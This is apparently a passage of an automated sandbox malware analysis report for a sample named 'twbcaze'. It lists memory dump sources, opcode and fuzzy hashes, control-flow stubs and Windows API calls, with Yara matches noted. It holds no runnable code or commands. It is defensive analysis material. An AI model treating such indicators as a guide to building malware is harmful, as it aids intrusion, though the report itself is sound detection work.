                                           • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                          • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                          • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                          • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                           • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                          • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                          • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                          • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                           • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                          • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                          • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                          • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                           • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                          • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                          • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                          • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                           • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph
                                          control_flow_graph 9 41a5f0-41a621 call 41af20 RtlAllocateHeap
                                          APIs
                                          • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID: &EA
                                          • API String ID: 1279760036-1330915590
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph
                                          control_flow_graph 207 408308-40835a call 41be20 call 41c9c0 call 40ace0 call 414e40 216 40835c-40836e PostThreadMessageW 207->216 217 40838e-408392 207->217 219 408370-40838a call 40a470 216->219 220 40838d 216->220 219->220 220->217
                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph
                                          control_flow_graph 223 408310-40831f 224 408328-40835a call 41c9c0 call 40ace0 call 414e40 223->224 225 408323 call 41be20 223->225 232 40835c-40836a PostThreadMessageW 224->232 233 40838e-408392 224->233 225->224 234 40836c-40836e 232->234 235 408370-40838a call 40a470 234->235 236 40838d 234->236 235->236 236->233
                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph
                                          control_flow_graph 254 4082d6-4082d8 255 4082a4-4082a5 254->255 256 4082da-4082de 254->256 257 4082e0-4082fd call 41b860 call 41b710 256->257 258 40835b-40835e 256->258 260 408360-40836a PostThreadMessageW 258->260 261 40836c-40836e 258->261 260->261 263 408370-40838a call 40a470 261->263 264 40838d-408392 261->264 263->264
                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph
                                          control_flow_graph 276 41a630-41a661 call 41af20 RtlFreeHeap
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph
                                          control_flow_graph 279 41a790-41a7c4 call 41af20 LookupPrivilegeValueW
                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A698
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: =$www.$www.
                                          • API String ID: 0-3343787489
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                          • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                          • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                          • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                          • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                          • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                          • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                          • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                          • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                          • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                          • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                          • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                          • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                          • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                          • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                          • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                          • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                          • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                          • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
